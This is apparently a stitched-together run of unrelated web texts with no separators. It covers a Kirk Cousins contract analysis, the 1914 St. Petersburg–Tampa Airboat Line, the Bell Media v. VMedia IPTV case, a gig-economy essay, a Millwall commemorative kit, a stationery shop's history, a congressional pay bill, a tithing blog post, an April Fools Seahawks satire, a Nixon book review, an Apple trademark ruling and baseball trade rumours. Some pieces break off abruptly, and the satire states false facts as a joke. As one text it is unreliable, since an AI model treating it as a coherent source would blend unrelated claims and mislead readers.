Signing Cousins to a contract worth over $20 million per year for multiple years would be a more complicated concept. The Redskins have been on the fence about Cousins' long-term potential, and though he's been statistically impressive over the last couple of seasons, there's reason for concern.
In 2016, Cousins completed 67 percent of his passes for 4,917 yards and 25 touchdowns with 12 interceptions, ranking third in Football Outsiders' season-cumulative defense-adjusted yards above replacement metric and fifth in the per-play metric.
These numbers say he's worth top-level quarterback money. And if Washington were to decide to let him walk, he'd most certainly be the most popular player on the free-agent market. Quarterbacks who put up stats like these don't tend to last too long.
When you look underneath the stats, however, it's just as easy to argue against the idea that Cousins is worthy of top-level money for the position or placement as the face of a franchise for half a decade.
He's become a better deep passer over time, but he's also helped by his targets and the offensive game-planning put forth by head coach Jay Gruden and former offensive coordinator Sean McVay, who's now the head coach of the Los Angeles Rams.
But when you watch Cousins' tape, you often see a player who is still uncomfortable under pressure and whose mechanics revert to those from earlier years at times. The question for the Redskins, or any other team interested in procuring Cousins' services over the long term, is whether he can transcend those issues.
Grading Scale
The St. Petersburg–Tampa Airboat Line (SPT Airboat Line) was the first scheduled airline using a fixed wing aircraft.[1] The airline provided service between St. Petersburg, Florida and neighboring Tampa across Tampa Bay a distance of about 23 miles. It was in service from January to May 1914.
Service [ edit ]
P. E. Fansler[2] brought in Thomas W. Benoist to start a service using his new airboats to create a service to connect the two cities that were as much as a day's travel apart in 1913 depending on means of travel: 2 hours by boat, 20 hours by car, 4 to 12 hours by train.[3] By plane, the travel time was about 23 minutes.[1] A 3-month contract was signed with the St.Petersburg board of trade on the 10th anniversary of the Kitty Hawk flight on December 17, 1913, according to which the Board of Trade agreed to guarantee meeting the expenses of the airline should it not break even.[4][5] The hangars promised for the airline were not completed, and the freight train holding the green and yellow "Lark of Duluth" was unaccounted for several days leading up to the launch date.[6]
On January 1, 1914, the SPT Airboat Line became the world's first scheduled winged airline service. That same day, Antony H. Jannus piloted the airline's Benoist Type XIV on its maiden flight between St. Petersburg and Tampa.[1] Due to widespread media coverage by the St. Petersburg Times, there were reportedly over 3,000 spectators at a parade accompanied by an Italian band at the departure point. An auction was then conducted for the first round-trip ticket. It was won with a final bid of $400 by the former mayor of St. Petersburg, Abram C. Pheil. Pheil then boarded the wooden, open-air craft for the 23-minute flight[7] that rarely exceeded an altitude of 5 feet (1.5 m) above the water of Tampa Bay.[1] Two additional Benoist air boats were added to the fleet soon after. One was used to ferry passengers and the second was used to train pilots.[8] Ticket prices were $5 per flight (one-way).[9] The first air-cargo was a bundle of St. Petersburg Times newspapers. Freight rates were $5 per 100 pounds.[9]
The airline continued to make flights until May 5, 1914, five weeks after contract termination.[1] From start to finish, the airline covered over 7,000 miles, 172 flights, and 1,205 passengers.[10]
Commenting on the significance of the St. Petersburg–Tampa Airboat line, Thomas Benoist, the builder of the Benoist airboats, said, "Some day people will be crossing oceans on airliners like they do on steamships today." The airline served as a prototype for today's global airline industry.[11]
Airplane [ edit ]
A Benoist XIV was used for flights. The infobox shows it being launched.
First takeoff run, January 1, 1914.
Airplane over Tampa Bay in 1914
Bell Media's fight with a small IPTV startup moved to the courtroom this week in a case that raises interesting questions about the future of technology and how Canadians watch TV.
"We are here because we were threatened with millions of dollars in damages under the copyright act," VMedia lawyer Rocco DiPucchio told Judge Fred Myers of the Ontario Superior Court of Justice.
At issue is VMedia's new service, which offers a so-called "skinny basic" cable package through a Roku app.
Roku, like AppleTV or Google's Chromecast, is a digital media player that allows users to stream content from the internet on their television.
In September, VMedia started offering a skinny basic cable package through Roku for $17.95 a month. The offer does not require a specific VMedia internet subscription.
With VMedia's package, anyone with a Roku player and their own internet subscription could have access to about 20 live television channels, including CTV, CBC, Global, as well as U.S. networks ABC, CBS, NBC, Fox and PBS.
A copyright question?
Shortly after it launched, Bell Media sent a cease and desist letter threatening legal action if VMedia did not remove Bell's signals from the new service.
VMedia agreed to pull Bell's channels from its new service while the argument played out in court.
Among the questions the court must decide is whether an Internet Protocol Television (IPTV) provider's CRTC license allows it to retransmit over-the-air TV signals over the internet. Or does doing so without paying a fee violate Canadian copyright laws?
As an IPTV provider, VMedia is a licensed Broadcasting Distribution Undertaking (BDU). BDUs, which include cable and satellite services, are generally allowed to retransmit over-the-air and other signals at no cost.
In court, VMedia's lawyer argued there is nothing in its license that specifies the manner of that transmission.
"Once you grant the licence, the BDU should be allowed to retransmit using any technology available," said DiPucchio.
But Bell contends that because VMedia's skinny basic service on its Roku app is offered over the internet, not a private managed network, it falls outside of the scope of VMedia's license.
Internet boundaries
"A private managed network is not the internet," said Bell lawyer Steve Mason.
In effect, Bell is arguing VMedia's IPTV transmission moves over a VMedia network from its server to its customers.
Whereas VMedia's Roku app transmits signals over the public internet.
And yet VMedia's IPTV requires an internet connection.
It's a distinction the judge appeared to find puzzling.
"You can't tell me whether if it's on a private managed network it doesn't touch any wire on the public internet," said Myers.
It's a crucial question.
Bell contends that because VMedia's skinny basic service on its Roku app is offered over the internet not a private managed network it falls outside of the scope of VMedia's license. (iStock)
Internet television companies that are not licensed BDUs do not have the right to retransmit over-over-the-air TV signals without an agreement with rights holders.
VMedia argues that regulation was aimed at websites such as JumpTV and iCraveTV, which posted links allowing anyone on the internet to stream TV signals, and was enacted long before the advent of digital media players like Roku.
If one wanted a sense of the importance of this case, one need only look at the number of lawyers Bell Media brought for this single day of arguments.
Bell showed up with a team of eight.
Besides Mason, a partner at the well connected firm of McCarthy Tetrault and his two associates, in the gallery were five others, including Bell senior vice president Robert Malcolmson — a former partner at Goodmans, another top law firm — and Kevin Goldstein, late of Osler, Hoskin & Harcourt LLP.
It may have been a show of force or that Bell simply wasn't taking any chances. Or perhaps both.
'This is about data'
"My guess is that this is about data," said Alan Wolk, author of Over The Top: How the internet is (slowly but surely) changing the television industry.
"[Companies like Bell] collect a lot of data off their set-top boxes. A lot of them have addressable advertising units that sell advertising based on data they've collected off a set-top box."
"If [the tv signal] goes through a set-top box [Bell] has more control over it ... [Bell] can actually track who's watching when, where," said Wolk.
"[Bell is] not exactly sure how this open internet thing is going to work, both in terms of ratings and just in terms of [Bell] knowing what is going on."
"Their fear is losing control."
Bell, along with other cable and satellite companies, once argued hard — and successfully — at the Supreme court against a system that could have seen cable companies required to pay TV stations for their signals.
That case reaffirmed that cable companies are allowed to pick up private channels' broadcast signals and retransmit them on their networks without having to pay for them.
Now Bell is contending that VMedia doesn't have the right to rebroadcast signals from its own stations over the internet.
Judge Myers said he would likely have a decision in this case by the end of next week.
A gig economy worker contemplates his worth as the machinery of capitalism crushes him into dust.
There are many ways of looking at “the gig economy” — the idea that people will make money in the future by picking up short-term, project, or shift work as necessary — but the two most prominent are as follows:
1) The gig economy gives people greater flexibility and choice in how and when they earn money, allows them to put assets like cars and houses to use, and gives them a vast array of chances to supplement their other income.
2) The gig economy represents the mass adoption of exploitative labor practice that deny workers compensation, benefits, stability, or the ability to plan for a future. It is a house of cards propped up by extravagant promises and VC funding.
I lean toward that second option, but that doesn't really mean anything, because we're going to get the gig economy whether we want it or not. Bloomberg has a great piece about the complex app ecosystem for the gig economy: apps that help workers juggle the multiple obligations that themselves were facilitated by apps. Snagajob, an HR startup, has snagged (lol) $1.2 billion in venture capital funding so far.
“What we are really building our business on is the blurring of the line between snagging a job and snagging a shift,” CEO Peter Harrison said.
The rise of the gig economy is complicated and overdetermined, but it plays on recent economic and technological themes: the precarious position of low-wage workers, the concentration of money in the upper reaches of income distribution, the increasing sophistication of logistical software, and the concurrent reliance on markets of various kinds to make determinations in nearly all fields of human endeavor. The gig economy makes sense to tech startups because it can be built on top of ever-more-elaborate software.
But just because the gig economy “makes sense” doesn't mean it works. Shady pricing has placed an entire subset of on-demand apps like Postmates and DoorDash, which rely on couriers, under scrutiny for making offerings seem more affordable than they really are. On-demand startups are predicated on the idea of becoming a habit, not a luxury.
Uber is extremely popular, but it also lost more than a billion dollars in the first half of this year. Its fares are cheaper because it uses investors' money to subsidize drivers. For that matter, Uber is also in the midst of a huge class-action lawsuit over whether its drivers do in fact qualify as employees (a judge recently threw out a proposed settlement in the case, calling it unfair).
Gig startups like Uber aren't cheap because they have a better business model, they're cheap because they've got money to burn. Tech companies in the gig economy are spending their ways into normalcy. And then apps like Snagajob are stacking themselves on top of those already volatile companies.
There is a devious sort of vocabulary around these sorts of startups. From Bloomberg's report:
Snagajob's Harrison says companies are “essentially sharing workers” much the way consumers are sharing car rides and vacation rentals.
Thanks to the gig economy, workers have even greater freedom to be treated as tools.
Millwall 14-15 Commemorative Camouflage Jersey
Italian brand Macron and Millwall FC today unveiled a special commemorative kit to show support for the 100th anniversary of World War One. The new unique Millwall FC 2014 Commemorative Kit is beige with a special Camouflage pattern on the front. Millwall FC will wear the commemorative kit against Brentford on November 8. This is the new Millwall FC 2015 Commemorative Kit.Based on the same template as the SSC Napoli Extrem Camouflage Shirt , the new Millwall 2014-15 Kit features a camouflage pattern on the front. Macron combines the beige kit with a navy kit collar, navy sleeve cuffs and navy logos.Millwall Football Club remember those who fought in the Great War from 1914, including several players volunteers from football clubs across the country.While the Millwall 14-15 Kits are sponsored by Euroferries, the special Millwall FC Commemorative Kit shows the logo of Headley Court Military Rehabilitation Centre on the front. Proceeds from all sales will be donated to the Headley Court Benevolent Fund. The new Millwall FC Commemorative Camouflage Kit will be available to pre-order from October 20, 2014.
Paper Goods & Gifts Designed by Hand in the Dash
Em Dash Paper Co. began as Sparrow Nest Script, a paper goods shop with an emphasis on modern calligraphy.
I created Sparrow Nest Script as I finished grad school in 2011, because none of the “normal” career paths for an English MA appealed to me. I've always had neat handwriting and I'd previously dabbled in calligraphy for a friend's wedding invitations, so I had the crazy thought that “hey, maybe something like that could turn into a career!” I dove in head first, naming the new shop to correlate with my existing knits store, Sparrow Nest Knits, which has since closed.
In the beginning, I spent $25 for some brown kraft cardstock and envelopes, a jar of black india ink, and a starter set of calligraphy nibs. Each card was cut and folded by hand, the greetings individually written with pen and ink. This method was great for someone with zero start-up capital, but it quickly proved too labor- and time-intensive for the amount of orders I was receiving.
As business grew, I made changes and improvements, such as investing in a scoring board, professional paper cutter, and Wacom drawing tablet. I started scanning and digitizing my designs so I could print them in larger batches and sell them for less than the early hand-drawn versions. My lettering slowly began incorporating new styles and embellishments.
In February 2013, I changed the shop's name to Em Dash Paper Co. As my work evolved away from its original calligraphy focus, the “script” part of the old name no longer made as much sense, and when Sparrow Nest Knits closed down, it took the “sister shop” significance of Sparrow Nest Script with it. Em Dash came about as a reference to my hyphenated last name, Poe dash Crawford, and my town, which is also hyphenated and nicknamed “the Dash.” The em dash itself is a callback to my literary background and love of grammar, so the new name seemed perfect on many levels.
Today, I continue to experiment with new styles and methods, always drawing every design by hand before scanning, vectorizing, and preparing for print. My work reflects a love of words, both as tools for communication and as works of art in themselves, and I'm always musing over the Next Big Idea. The environment is very important to me, so I use recycled papers for my creations and ship packages with biodegradable plastic sleeves and recycled mailers. The few companies I work with to print my designs are also committed to using green practices and environmentally responsible materials.
The ultimate goal of Em Dash Paper Co. is to spread joy and facilitate connection through the written word. At the core of my business is this lyric from my favorite Frightened Rabbit song: “while I'm alive, I'll make tiny changes to earth.”
♥
A Republican and Democrat have put forward legislation that would rescind the automatic pay increase lawmakers are slated to receive in 2011.
Reps. Harry Mitchell (D-Ariz.) and Ron Paul (R-Texas) introduced a bill late Thursday night that would freeze the automatic cost of living increase for Members in 2011, citing the ailing economy.
“With unemployment high and so many families struggling to make ends meet, it is unconscionable to think that Congress is considering giving itself a pay raise,” said Mitchell in a statement.
ADVERTISEMENT
Congress froze 2010 automatic pay increase earlier this year, after more than a dozen lawmakers, including Mitchell and Paul, had put forward legislation similar to the bill introduced this week.“Turning down our automatic pay increase is the least Congress could do to demonstrate fiscal responsibility and solidarity with our constituents in these tough economic times,” said Paul in a statement on Friday. “Much more needs to be done to reduce the size and expense of government, but passing this legislation would be a start.”Congress has abided by a process approved in 1989, which stipulates that lawmakers will automatically receive a cost of living pay increase every January unless members vote specifically to reject the raise – a politically precarious position.
August: $6551.92
July: $15273.52
June: $4938.74
May: $3705.91
April: $6428.15
I feel like I'm preaching to the choir when I talk about the value that your generous gifts buy. Toady One has made a super human effort to squash bugs as well as respond to suggestions. We don't want him to burn out do we? Did you know that this is a problem that can actually be solved by throwing money at it? We are super grateful for all you have done for us and allowing us to live a true-life dream!Congratulations to the generous!Another great month! Thanks to everybody that helped out. The plan remains the same, more or less -- there are lots of bugs to be fixed and several releases to be released. I'll probably also work in some of the other changes promised, such as small suggestions, fruit harvesting, and the thought update.Reward reminder: If you support us , you can pick either a Story Reward or a Crayon/Colored Pencil Art Reward. A Story Reward is basically a mini-Threetoe story ( examples ) and a Crayon Art Reward is a crudely drawn scene which we sketch, color in, and mail to you, anywhere in the world (assuming your contribution covers postage, which is about a dollar almost wherever you are). We take personal requests for either reward as well, he he he. You can also be listed among the Bay 12 Champions
This post is part 1 of a 3-part series on tithing and giving:
Average Tithers
If you're average like us, on any given Sunday you've put something in the offering plate as it passed that amounted to a tithe on your net (after tax) income, or a tithe on gross, or a super-size offering, or some random change, or five dollar bill, or 6% of your current income…
Or, nothing at all.
If you're average like us, you've heard loads of pastors tell you that Christians are supposed to tithe (“Trust God!” “Step out in faith!” “Plant that seed!”), the implication being that “good” Christians tithe, and those who don't, well…
If you're average like us, you've had your share of financial ups and downs (due to emergencies, or job loss, or a blown engine or poor management, or just plain being too materialistic, or lousy decision making, or all of the above in our case) where making a decision about what you could, should, would put in the plate on Sunday was a high-stress, angst-filled mental wrestling match.
And if you're average like us, you've wrestled with feelings of guilt when you didn't tithe, and maybe even some secret, self-righteous pride when you did.
If you're average like us, you're blessed to attend a church that emphasizes stewardship – the wise management of all your resources for God's kingdom – over tithing. But tithing still hangs around in your mind as this minimum standard good Christians have to meet – like the first jump for a high jumper. Miss it, and you're out of the competition.
Are you average like us? Yes? Then you've wrestled with the same questions, doubts, guilt, presumption and pride we have.
Tell you what. Let's figure this out together starting in Genesis, shall we?
A Little Biblical History
The first tither was Abraham, who gave a tenth of the spoils of war to a mysterious priest/king named Melchizedek in Genesis 14:20. We don't read that Abraham was commanded to give that tithe; apparently it was just part of the ancient near-east cultural norms and Melchizedek blessed him for doing it.
Four hundred plus years later, when God established His covenant with Israel after the exodus from Egypt, He commanded the Jews to give a tithe of their produce to support the Priests and Levites since they were not to receive any property when the Promised Land was divided up among the tribes of Israel (Numbers 18).
Fast forward another thousand years or so, and the prophet Malachi brought God's charge against Israel that they were breaking His covenant and robbing Him (yikes!) by not giving the tithes for the Priests and Levites. Malachi challenged Israel to repent and see how God would bless them if they renewed their obedience to the tithing regulations of God's covenant with them.
Now jump forward another four hundred-ish years to Jesus, who gave the Pharisees (whom he was berating) a backhanded compliment for tithing their herbs and spices. And then…
Nothing.
As in, no other teaching on tithing any where in the New Testament. Zip. Nada. Nothing from Jesus. Nothing from Paul, Peter, John, Jude or James. Not one word.
Why?
Because tithing isn't an obligation of the New Covenant in Christ.
Now, before you take up pitchforks and torches, lemme ‘splain Lucy…
Jesus instituted a New Covenant when He shared His last Passover meal with the twelve disciples. He broke the bread. He passed the cup. Whenever you partake in Communion you are saying, “I am part of the New Covenant God made with Christ's followers.” Whenever you hear the gospel – that your sins are forgiven because Jesus has done for you what you could not do for yourself (i.e., pay the penalty for your sins and live to tell about it) – you are hearing the central message and blessing of the New Covenant.
The Gospel Goes Multi-Ethnic
Okay, so there's no question that the Old Covenant administered through Moses was made with the Jews only, right? If an Egyptian or a Moabite wanted in on the blessings of that Covenant, he had to become a Jew and submit to it's obligations – Ten Commandments, circumcision, tithing to support the priesthood, not eating pork – everything. But, the apostles Peter and Paul quickly figured out that the New Covenant administered by Jesus was for both Jews and non-Jews (like AverageUs). They understood that the blessing of the gospel of Christ, this New Covenant in His blood, was for all nations.
But this, raised a critical question for the early church leaders: If the New Covenant includes non-Jews, were non-Jews obligated to keep any part of the Old Covenant?
Put yourself in Peter's place. You're a Jewish fisherman. You were born under the Old Covenant and lived with an obligation to keep the Law of Moses all your life. Jesus called you to follow Him. After His resurrection, you finally get what Jesus has been trying to drum into your head for three years. It's about redemption for anyone who believes. Now you're the leader of the church. And now, Gentiles want in. They weren't born under the Old Covenant. They've never kept the Law. Do they have to become Jews before they can become Christians? Do they have to keep the Old Covenant laws to enjoy the blessing of the New Covenant? Is this like baseball where you have to tag first before you can go to second?
And The Answer Is…
A resounding NO. The Jewish church leaders got together to discuss the matter and their conclusion was simple: Non-Jews mustn't be forced to keep a law that we Jews have failed to keep ourselves (Acts 15:10). Instead, they gave a few instructions that Gentile followers of Christ should not eat food offered to idols or meat that hadn't been properly butchered, and should shun all forms of sexual immorality (Acts 15:29). No requirement to be circumcised. No requirement to tithe.
In fact, in all the letters the apostles wrote to both Jews and Gentiles which explained how to live a gospel-driven, Christ-centered life, not once did they teach tithing. They taught on every conceivable subject related to Christian living: church order, prayer, spiritual growth, church discipline, leadership qualifications, worship, personal ministry, marriage, parenting. They even taught on subjects that might logically lead to a discussion of tithing like work and charity.
In short, the Apostles had every opportunity to teach the fledgling churches that they must tithe, but they didn't. Why? Because they viewed tithing as an obligation of the Old Covenant, a covenant that Gentiles never were a part of, a covenant that Christ replaced with another, better covenant with His church.
Our Conclusions, Until the Next Post…
Christians are not obligated to tithe. (No Guilt!) Tithing is not a mark of a “good” Christian. (No Pride!) God is not displeased with a Christian merely because s/he doesn't tithe. God is not pleased with a Christian merely because s/he does tithe. These conclusions are, we think, in harmony with the gospel.
Ah, but this doesn't answer all of your questions, does it?
But you're tired of reading this anyway, right?
So, let's continue another time, shall we? For now, we'll just hint that the New Covenant has it's own obligations – one that touches on the subjects of giving and charity and stewardship.
If you have a specific question about tithing, leave a comment and AverageUs will try to address it next time.
Dawn and I sincerely hope this helps some of you to experience the freedom of the gospel in a new way. Be blessed.
Read Part 2 in this 3-part series.
Add to: Facebook | Twitter | Digg | Del.icio.us | Stumbleupon | Reddit | Technorati | Yahoo Buzz
It seems to be promotional silly-season right now, and Aksys Games is leaping into the fray with a series of download offers coming to the 3DS eShop and, for the most part, the PlayStation Network. The offer coming to the 3DS eShop, however, is an absolute beauty.
From 1st - 15th September BIT.TRIP SAGA will be reduced to $4.99 from $14.99. This collection of all six classic WiiWare titles — with 3D thrown in, of course — will ultimately offer each game for less than a dollar, from one perspective, and will surely be good value in anyone's book.
We're big fans of the BIT.TRIP games here are Nintendo Life, and had plenty of positives to share in our BIT.TRIP SAGA review. This offer is North America-only, however, as Rising Star Games published the title in Europe, as opposed to Aksys Games.
So for those in North America, are you tempted to pick this up for five bucks on 1st September?
CBN host Pat Robertson (screen grab)
Televangelist Pat Robertson on Thursday told an unmarried man who was worried about “burning in hell” that he should find a wife at the dating website ChristianMingle.com.
“What happens when the Lord doesn't put a woman in one's life?” a viewer named Paul asked Robertson in an email on Thursday. “I'm 52 and never had an opportunity to be married. Why should I burn in hell just for thoughts when the Lord hasn't lifted a finger to help me? I think it's very cruel.”
“Come off it,” Robertson quipped. “Go get your own woman. Why do you think God's got to get you one? I tell you what, there are a heap of ladies around who are just yearning to find a good man to be a husband, they're all over.”
“And what you need to do is to go where they are,” he continued. “Just don't sit around waiting and say, oh, God, send me a spouse, I've got — quote — nasty thoughts and I'll burn in hell if I don't get one. I mean, please.”
The TV preacher said that one solution was to go online to find a wife.
“There something called Christian Mingle that has 5 million people… So look around, and don't be blaming God.”
Watch the video below from CBN's The 700 Club, broadcast April 9, 2015.
The Seattle Seahawks won the Super Bowl. Not only that, but it was one of the most dominating Super Bowl wins in NFL history, going up 36-0 at one point and ultimately winning 43-8. Oh, and also it came against PEYTON MANNING and the Denver Broncos.
(lol)
So get this, uh, the Seahawks scored on the first play of the game. Yeah, that's it. Oh and it wasn't even their ball, the Broncos had it. Umm, like, it was a horrible shotgun snap that went into the end zone for a safety and Seattle was up 2-0 for the quickest score in Super Bowl history. Uh huh.
And like, Denver had maybe the greatest offense in pro football history, scoring the most points ever, and favored to win the game but ended up losing by 35 points. It was like, the biggest point differential in a Super Bowl since 1992.
So this is kind of how it went down.
Umm, let's say that after the safety, the Broncos couldn't get any first downs against the Seahawks and then they got a couple of field goals to go up 8-0, but then Kam Chancellor intercepted Manning at the end of the first quarter even though Manning only had 11 interceptions in the previous 18 games and was league MVP. Then I guess Percy Harvin had a quick 15-yard end-around and um, Marshawn Lynch scored from 1-yard out to make it 15-0 and there were still 12 minutes left in the first half.
Yeah, that's it.
So then Denver finally starts driving into Seattle territory for the first time and all of a sudden Malcolm Smith, who was like, not even drafted until the seventh round and hardly ever played in his three year career, intercepted maybe the greatest quarterback of all-time and returned it 69 yards for a touchdown to make it 22-0.
(God, is anyone even buying this anymore?)
Like, it was so bad that a team in the Super Bowl was actually going for it on fourth down in the first half of the championship game.
Okay and let's also say that the Seahawks quarterback is some dude named "Russell Wilson" and he's the shortest QB in the league, and was only in his second season, and was only drafted in the third round behind 74 other prospects including a punter. And just for shits and giggles, he's easily got top-10 all-time numbers from a QB in his first two seasons, and arguably top five.
And he is also a member of a major league baseball organization.
(Yeah right.)
Oh right, back to the "game" that totally happened.
Umm, on the second half kickoff, Harvin, who was the biggest offseason acquisition in the league maybe and played in just one regular season game and one postseason game before getting hurt again, took it to the house to make it 29-0 and essentially put all of Denver's hopes to rest.
(You could ONLY make this stuff up.)
With 7:17 left in the third quarter, Jon Ryan punted for the first and only time.
Three plays later, the Broncos' Demaryius Thomas fumbled the ball and Smith had another turnover go in his favor when he recovered it. Three minutes later, "Wilson" threw a 23-yard touchdown pass to Jermaine Kearse, who was too shitty to even be drafted.
In fact, let's just say that other players that were too crappy to be drafted were, uh, Doug Baldwin, Chris Clemons, Michael Bennett, Tony McDaniel, Ricardo Lockette, Alvin Bailey, Derrick Coleman (while we're at it, let's just say that Coleman is legally deaf), Heath Farwell and Chris Maragos.
Also there's this "player" named "Richard Sherman" that didn't go until the "fifth round" and is the "best" "cornerback" in the "entire" league maybe and "definitely" one of the most "recognizable" players in the "league" now and "has" 20 "interceptions" despite making only "42" career starts.
Aaaannnnnddd the head coach is some guy named Pete Carroll. Yeah, that guy who was exiled from the NFL like 15 years ago, if you can even remember that.
So finally the Broncos scored and in a Super Bowl game, a team went for a two-point conversion before the fourth quarter had even begun.
(By now it's pretty obvious that this is a joke, so why even continue?)
Then to top it all off, Wilson threw another touchdown pass, this time to his other undrafted free agent receiver Baldwin (seriously, the Broncos are the only team with good receivers and if this game even happened, it would be Thomas and Eric Decker and Wes Welker catchin' all the scores, y'all) and it was the final score of 43-8.
(I didn't even try to make it LOOK like a real score.)
With two minutes left to go, it was DENVER that ended up running out the clock so they could go home.
"Wilson," a player that was barely recruited coming out of high school and ended up choosing NC State over "Duke" (who didn't even get a football team until 2013 so you know I'm lying) joined Kurt Warner as the only players to ever throw two touchdowns in a Super Bowl in one of their first two seasons. Which would technically mean that Wilson was the first player to do it within two years of being drafted.
I guess you could even say that "Russell Wilson" was the third-youngest quarterback to ever win a Super Bowl. And of the six-youngest QBs to ever win a Super Bowl besides "Wilson," the only one to not win a second championship was Joe Namath.
Oh and the "Seahawks" totally didn't get relocated to Los Angeles in 1996 and totally exist and the city of "Seattle" didn't get demolished in the quake of 1999. "Sure, buddy."
God...
APRIL FOOL'S YOU STUPID MORONS!
The Seahawks could never win a Super Bowl.
On October 11, 1973, one day after Spiro Agnew resigned as vice president, of the United States, the following conversation took place between Secretary of State Henry Kissinger and Brent Scowcroft, the deputy national security advisor.
“The switchboard just got a call from 10 Downing Street to inquire whether the President would be available for a call within 30 minutes from the Prime Minister,” Scowcroft said during his phone conversation with the secretary of state. “The subject would be the Middle East.”
Kissinger answered Scowcroft's question with another question. “Can we tell them no?” he asked. “When I talked to the President he was loaded.”
At the time of their conversation, the Yom Kippur War between Israel and an alliance of Arab nations led by Egypt and Syria was less than a week old. The president, of course, was Richard Nixon, whose second term would end 10 months later in August 1974, less than halfway through his second term.
Again and again, Nixon suffers from exhaustion, insomnia, and drunkenness, enhanced and exacerbated by a lifelong low threshold for alcohol and constant fatigue.
Tim Weiner, a former New York Times reporter, has sifted through a trove of newly released tapes and documents to expand on earlier accounts of Nixon's doomed presidency. Weiner previously wrote well-received books detailing the histories of the CIA and the FBI – an ideal foundation for delving into the endless rabbit hole of Watergate, secret White House tapes, and the numerous episodes of illegal wiretapping and political tricks employed by (sorry, had to say it) all the president's men.
One Man Against the World is one of two significant additions to the Nixon library this summer. Evan Thomas' “Being Nixon: A Man Divided” (reviewed by The Monitor in July) considered the 37th president through the lens of his warring selves: the reckless, corrupt, win-at-all costs paranoid politician versus the erudite global strategist with a penchant for scrawling noble goals on legal pads in the wee hours of the morning.
Thomas at times gives Nixon too much benefit of the doubt, deploring the anti-Semitic, racist, and other crude remarks found on the White House tapes while often dismissing them as bluster. Weiner goes to the opposite extreme, always ascribing the worst possible motives to Nixon's character.
What makes the argument against Weiner's condemnation difficult to rebut are the many transcripts and documents the author uses to make his case. For those younger than the Baby Boomers, who either didn't live through these dark days or were too young to remember or recognize those tumultuous events, the sheer lunacy of those years is sobering.
Attorneys general coming and going like NFL coaches; a Saturday Night Massacre that finds the president illegally dumping the Watergate special prosecutor and top Justice Department officials; and, among many other self-incriminating revelations, taped conversations ordered by Nixon himself that include the president openly discussing slush funds, cover-ups and perjury. Read enough of this and one might long for more presidential debates with Donald Trump.
The sheer tonnage of bad news and crippling controversies beginning in 1972 – the break-in at the Watergate headquarters of the Democratic party headquarters occurred in June – snowballed after Nixon won re-election in November. FBI deputy Mark Felt, the man revealed decades later to be the secret government source known as “Deep Throat” in Washington Post stories by Carl Bernstein and Bob Woodward, was among those in the federal government so repulsed by the White House that he was willing to take on a president.
Throughout the ordeal, Nixon raged at perceived enemies in Congress, in the media, and in the federal government. He went to China, yes, but he also presided over ultimately failed summits with the Soviets, signing arms-reduction treaties that, in fact, spurred the arms race. With Kissinger, Nixon tried and failed for years to end the Vietnam War, presiding over fruitless negotiations while overseeing illegal bombings in Cambodia.
When, at last, Nixon managed to secure the release of 591 prisoners of war, he hosted them and their families on the White House lawn in May of 1973.
Even then, he gave in to baser instincts, telling the POWs in his remarks, “And let me say, I think it is time in this country to quit making national heroes out of those who steal secrets and publish them in the newspapers.”
Get the Monitor Stories you care about delivered to your inbox. By signing up, you agree to our Privacy Policy
Fourteen months later, he resigned in disgrace. He lived 20 more years, publishing lengthy books on diplomacy and geopolitical strategy and scrambling to recover some sense of dignity. If the more favorable but still damning portrait by Thomas represents the best chance for Nixon's rehabilitation, Weiner's book is, no doubt, the portrait Nixon hoped to avoid.
The tragedy of Richard Nixon, all these years later, remains sad and disturbing.
Apple Inc has lost a trademark lawsuit in China, with a court here allowing a leather goods maker to sell wallets and handbags flashing the world's biggest technology giant's exclusive ‘iPhone' name.
The Beijing Municipal High People's Court ruled in favour of Xintong Tiandi Technology (Beijing) limited, which sells a number of leather products such as smartphone cases and handbags under the name ‘IPHONE', state media reported.
In 2002, Apple applied for the ‘iPhone' trademark for its electronic goods in China, but it was not actually granted until 2013. Xintong Tiandi filed for its own ‘IPHONE' trademark in China in 2007, the same year the first generation of Apple's iPhone was launched in the US.
In order to obtain the exclusivity on the use of the 'iPhone' trademark in China, Apple first took the case to the Chinese trademark authority in 2012, but it failed as the agency claimed Apple could not prove the name ‘iPhone' was a well-known brand prior to Xintong Tiandi's registration in 2007. Apple then filed a lawsuit in a Beijing court.
The court, however, ruled against it and Apple appealed to the Beijing Municipal High People's Court. The court said the company did not sell the iPhone in China until 2009.
The final judgment means Xintong Tiandi could continue to use the trademark to sell its products, state-run China Daily reported yesterday.
Apple did not comment on the ruling.
The ruling comes as Apple's latest quarterly earnings showed a 13 per cent drop in revenue as sales of iPhones.
China was a particular weak spot as the sales in China fell 26 per cent to USD 12.49 billion due to weak demand for iPhones.
Xintong Tiandi confirmed the court ruling on its website and said the decision represented a victory for free consumer markets.
James Yan, a Beijing—based analyst at Counterpoint Technology Market Research said, “The failure of the trademark fight would not have a great impact on Apple's brand and image but it might confuse consumers as they do not know whether these products are made by Apple or some producers copy Apple's name when they are buying leather products embossed with the ‘IPHONE' brand“.
Zhu Dalin, an analyst at Beijing—based Internet consultancy Analyses International said the influence of Xintong Tiandi is very minor which would not pose a threat to Apple anyways as Apple mainly focuses on electronic devices such as smartphones and iPads.
Share or comment on this article
Via: thehindubusinessline.com
Read More:
https://www.savemysweden.com/why-i-bared-my-breasts-for-a-school-photo/
Fresh off a surprising appearance in the American League wild-card game, the Minnesota Twins are apparently eyeing a potential improvement to their relief corps on the trade market.
Minnesota reportedly inquired with the Cincinnati Reds about the availability of closer Raisel Iglesias, sources told Jon Morosi of MLB Network. It's unclear how far those talks may have progressed, or what the Reds might seek in return for the 27-year-old, if they're indeed open to trading him.
This past season was Iglesias' first as a full-time closer, and he took to the role quite well. Despite closing for a last-place Reds team that lost 94 games, the Cuban right-hander notched 28 saves while posting a 2.49 ERA and averaging nearly 11 strikeouts per nine innings. He also allowed only five home runs all year, and blew just two of his 30 save opportunities.
Iglesias may not come cheap in a trade, however, as he's pitching on a team-friendly contract with years of control left. He's set to make only $14.5-million over the final three seasons of his seven-year contract, though Iglesias does have the right to opt out of the contract in favor of arbitration this winter. Should he choose to go into arbitration, MLB Trade Rumors projects he'll be paid $2.8 million in 2018; otherwise, he'll earn a salary of $4.5 million next season.
Despite the Twins' success in 2017, the bullpen represented a major weakness last year. Their relievers' cumulative 4.40 ERA ranked 22nd in baseball, and the unit was weakened significantly by a deadline-day trade that sent closer Brandon Kintzler to Washington. The Twins moved to a closer-by-committee setup over the final two months of the season.
Morosi added that the Twins are reportedly also doing their "due diligence" on many other bullpen names who might be available, but did not specify other potential targets besides Iglesias.
The US State Department and Pentagon on Tuesday ordered the families of American diplomats and military staff to leave posts in southern Turkey because of security fears.
